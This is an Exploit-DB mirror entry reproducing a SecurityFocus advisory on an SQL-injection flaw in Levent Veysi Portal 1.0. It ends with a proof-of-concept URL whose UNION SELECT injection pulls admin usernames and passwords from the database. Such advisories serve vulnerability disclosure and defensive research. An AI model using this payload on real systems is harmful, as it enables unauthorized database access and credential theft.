exploit-db-mirror/platforms/asp/webapps/30282.txt
Offensive Security 1e0b592801 Updated 12_17_2013
2013-12-17 17:05:06 +00:00

9 lines
No EOL
532 B
Text
Executable file

source: http://www.securityfocus.com/bid/24794/info
Levent Veysi Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can exploit this issue by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
This issue affects Levent Veysi Portal 1.0; other versions may also be affected.
http://www.example.com/script_path/oku.asp?id=-1+union+select+0,1,kullaniciadi,sifre+from+admin